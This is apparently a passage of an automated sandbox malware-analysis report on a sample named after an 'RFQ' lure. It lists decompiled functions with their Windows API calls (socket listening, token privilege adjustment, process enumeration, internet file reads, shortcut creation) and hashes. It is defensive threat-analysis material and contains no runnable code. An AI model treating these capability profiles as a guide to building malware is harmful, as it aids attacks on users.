bind.WSOCK32(00000000,?,00000010), ref: 00476307
listen.WSOCK32(00000000,00000005), ref: 00476316
WSAGetLastError.WSOCK32(00000000), ref: 00476330
closesocket.WSOCK32(00000000,00000000), ref: 00476344

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
Instruction ID: 9cc0b371228dcaf8913226d6fe42490e105b9b769aefcc5547ebbaeef9b3f94b
Opcode Fuzzy Hash: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
Instruction Fuzzy Hash: 6521F2312006049FCB10FF64C845A6EB7BAEF44324F15856EEC1AA73D2C734AC05CB59

Function 00415520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01

_memmove.LIBCMT ref: 00450258
_memmove.LIBCMT ref: 0045036D
_memmove.LIBCMT ref: 00450414

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 7b39b4339eb409c41603910e355eb4aea2eb8ffb8365a16bb6f059eb92d4f5c7
Instruction ID: ce31bd404333394545349dab4fd8ad238969c684e33d592a62d2001407cdf1f6
Opcode Fuzzy Hash: 7b39b4339eb409c41603910e355eb4aea2eb8ffb8365a16bb6f059eb92d4f5c7
Instruction Fuzzy Hash: 3202E270A00205DBCF04DF65D9816AEBBF5EF84304F54806EE80ADB392EB39D955CB99

Function 00401287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

DefDlgProcW.USER32(?,?,?,?,?), ref: 004019FA
GetSysColor.USER32(0000000F), ref: 00401A4E
SetBkColor.GDI32(?,00000000), ref: 00401A61

Part of subcall function 00401290: DefDlgProcW.USER32(?,00000020,?), ref: 004012D8

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
Instruction ID: d041ec2a837aeb515327988813bafb0785b4d0a615f46c6b1421ede386c2745f
Opcode Fuzzy Hash: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
Instruction Fuzzy Hash: A4A124B1202544BAE629BA694C88F7F255CDF45345F14053FF602F62F2CA3C9D429ABE

Function 00476747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0047679E
WSAGetLastError.WSOCK32(00000000), ref: 004767C7
bind.WSOCK32(00000000,?,00000010), ref: 00476800
WSAGetLastError.WSOCK32(00000000), ref: 0047680D
closesocket.WSOCK32(00000000,00000000), ref: 00476821

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: c3678cbd9f04907b78b21f7c60552e65a77e2ac58af8dde8cfff1331ff6b0f68
Instruction ID: 4f4fa4b069b112be458f20050bee2991dabce79e459f6d74e9331a247e2dcb9e
Opcode Fuzzy Hash: c3678cbd9f04907b78b21f7c60552e65a77e2ac58af8dde8cfff1331ff6b0f68
Instruction Fuzzy Hash: E941D275A00600AFDB10BF258C86F6E77A89F45718F05C56EFA59BB3C3CA789D008799

Function 00485376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 004853C5
IsWindowEnabled.USER32 ref: 004853D3
GetForegroundWindow.USER32(?,?,00000001), ref: 004853E0
IsIconic.USER32 ref: 004853EE
IsZoomed.USER32 ref: 004853FC

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
Instruction ID: 2bf7cd1b22f0a435aba1bf6783624a0e9851140f374647b9b1574053626a0f4e
Opcode Fuzzy Hash: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
Instruction Fuzzy Hash: BB11B232700911ABEB217F269C44A6F7B99EF447A1B40483EFC45E3242DB789C0287AD

Function 004580A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
Instruction ID: 8dae455e1ba13099d0d58f164bb34b259a0b96a713bdc7d240504e0717c8d456
Opcode Fuzzy Hash: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
Instruction Fuzzy Hash: EBF08C30200614AFEB104FA4EC8CE6B3BACEF4A755B10043EF90592251DF649C09DB64

Function 0046C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0046C432
CoCreateInstance.OLE32(00492D6C,00000000,00000001,00492BDC,?), ref: 0046C44A

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

CoUninitialize.OLE32 ref: 0046C6B7

Strings

.lnk, xrefs: 0046C3C6, 0046C3EE, 0046C3F8

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
Instruction ID: adb56a4b7a52abdaef05598002f92e73435f728c8d9d90c66f29e414dbdf6fe1
Opcode Fuzzy Hash: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
Instruction Fuzzy Hash: 5AA14AB1104205AFD700EF55C881EAFB7E8EF85308F00492EF595972A2EB75EE09CB56

Function 00404B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00404AD0), ref: 00404B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404B57

Strings

kernel32.dll, xrefs: 00404B40
GetNativeSystemInfo, xrefs: 00404B51

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
Instruction ID: eac2b9657e48c1354d3ce07b29e145d4c0a45f8badf8df95cafcbf2a1bd35060
Opcode Fuzzy Hash: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
Instruction Fuzzy Hash: 8ED01274A10713CFD720AF31D818B0A76E4AF45751B218C3F9485D6690D678F8C4C75C

Function 0047EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0047EE3D
Process32FirstW.KERNEL32(00000000,?), ref: 0047EE4B

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Process32NextW.KERNEL32(00000000,?), ref: 0047EF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0047EF1A

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 89fde9512b94cb07eafd2aa5ff05997a94c0a9f5672a7c8b2447530929707f10
Instruction ID: a98c0e68db7b9d45d0fd814aff1298f869d04e0007e226020b87bcf654703779
Opcode Fuzzy Hash: 89fde9512b94cb07eafd2aa5ff05997a94c0a9f5672a7c8b2447530929707f10
Instruction Fuzzy Hash: BB519171504300AFD310EF21CC85EABB7E8EF88714F10492EF595A72A1DB34AD08CB96

Function 0045E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 0045E628

Strings

|, xrefs: 0045E658
(, xrefs: 0045E66E

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: e4b6563495775eced85f6639daf36049b9172e9dced26037dbca7602620842ae
Instruction ID: d66d97c7bb63d5e7dad9b567a4e3f94d41a6da7275ee88609bc8c1bec3a8e44c
Opcode Fuzzy Hash: e4b6563495775eced85f6639daf36049b9172e9dced26037dbca7602620842ae
Instruction Fuzzy Hash: 21322675A007059FD728CF2AC481A6AB7F0FF48310B15C56EE89ADB3A2E774E941CB44

Function 004722EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047180A,00000000), ref: 004723E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00472418

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: c748683f7969d9ff2733bc686b9ffa3dceda9ccf9dbca2d15652f0b20a90f335
Instruction ID: 97e6fa55f52fdedc64eb36c533065f345fcd4e8e1beeb73d4f24c64f527f6271
Opcode Fuzzy Hash: c748683f7969d9ff2733bc686b9ffa3dceda9ccf9dbca2d15652f0b20a90f335
Instruction Fuzzy Hash: 0941DA71604205BFEB20DE65DE81EFB77BCEB40314F10806FFA49A6241DABC9E419658

Function 0046B333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0046B343
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0046B39D
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0046B3EA

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
Instruction ID: 737ef1c34fd19c378388d330bbb387c55d680846c188baab6e7c30573ba64571
Opcode Fuzzy Hash: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
Instruction Fuzzy Hash: 7D21AE75A10108EFCB00EFA5D880AEEBBB8FF48314F0080AAE905AB351DB359D59CB55

Function 004587E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
GetLastError.KERNEL32 ref: 00458865

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 5b4b1d7d67927872bd2662a97e5438a507af917e4c63a758eda2fff7e1a615f8
Instruction ID: 5e41a7b511489fb1457012ee205441660039eb57adee2e696ecce50f3e5e177b
Opcode Fuzzy Hash: 5b4b1d7d67927872bd2662a97e5438a507af917e4c63a758eda2fff7e1a615f8
Instruction Fuzzy Hash: 7511BFB2514204AFE718EFA4EC85D2BB7F8EB05315B60852EF85593212EF34BC448B64

Function 0045874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00458774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0045878B
FreeSid.ADVAPI32(?), ref: 0045879B

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
Instruction ID: 222101879978235e3db2a0a583f2c1bf244a93baf2b2f2d6b5292d8d16c370cf
Opcode Fuzzy Hash: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
Instruction Fuzzy Hash: 4CF04F7591130CBFDF00DFF4DC89AAEB7BCEF09201F104879A901E2181D7756A088B54

Function 00468889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 0046889B

Part of subcall function 0042520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00468F6E,00000000,?,?,?,?,0046911F,00000000,?), ref: 00425213
Part of subcall function 0042520A: __aulldiv.LIBCMT ref: 00425233

Strings

0eL, xrefs: 00468892

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID: 0eL
API String ID: 2893107130-3167399643
Opcode ID: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
Instruction ID: 2c57299538d283c5d644ae0a39161a0e0d0ec28ce0c746f6c7e9e831f8b60585
Opcode Fuzzy Hash: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
Instruction Fuzzy Hash: B421AF326256108BC729CF29D841A52B3E1EFA5311B698F6DD0F5CB2C0DA38A905CB58

Function 0046C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0046C6FB
FindClose.KERNEL32(00000000), ref: 0046C72B

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
Instruction ID: b4b64e4e0be63edce78860a78e1dfdfe78961efcf08952f795b51eb70efe8952
Opcode Fuzzy Hash: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
